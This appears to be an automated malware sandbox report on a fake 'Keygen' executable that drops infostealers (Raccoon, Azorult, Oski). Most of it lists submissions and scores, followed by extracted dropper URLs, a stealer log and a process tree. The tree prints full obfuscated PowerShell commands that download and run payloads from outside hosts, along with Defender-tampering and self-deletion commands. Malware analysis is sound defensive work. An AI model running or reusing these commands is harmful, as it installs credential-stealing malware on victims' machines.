Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    50s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 21:56:59 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (858 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3824
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3108.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1228
      • C:\Users\Admin\AppData\Local\Temp\3108.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1792
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3108.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2120
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1892
          • C:\Users\Public\bny.exe
            "C:\Users\Public\bny.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4928
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:5044
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4204
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4204 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\321399649350552\\* & exit
                  8⤵
                    PID:3748
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4204
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4516
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:5056
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4216
              • C:\Users\Public\bny.exe
                "C:\Users\Public\bny.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4148
                • C:\Users\Admin\AppData\Local\Temp\HW21Tz5VHS.exe
                  "C:\Users\Admin\AppData\Local\Temp\HW21Tz5VHS.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:5012
                • C:\Users\Admin\AppData\Local\Temp\O9nHlj8W0j.exe
                  "C:\Users\Admin\AppData\Local\Temp\O9nHlj8W0j.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1628
                • C:\Users\Admin\AppData\Local\Temp\I9Hk6nm4Ii.exe
                  "C:\Users\Admin\AppData\Local\Temp\I9Hk6nm4Ii.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:4700
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\pvm1z3b2.inf
                    8⤵
                      PID:5096
                  • C:\Users\Admin\AppData\Local\Temp\vuKJHBh5Ry.exe
                    "C:\Users\Admin\AppData\Local\Temp\vuKJHBh5Ry.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3760
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5088
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\bny.exe"
                    7⤵
                      PID:4976
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:988
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3108.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2976
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3828
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:2420
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3108.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3676
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = 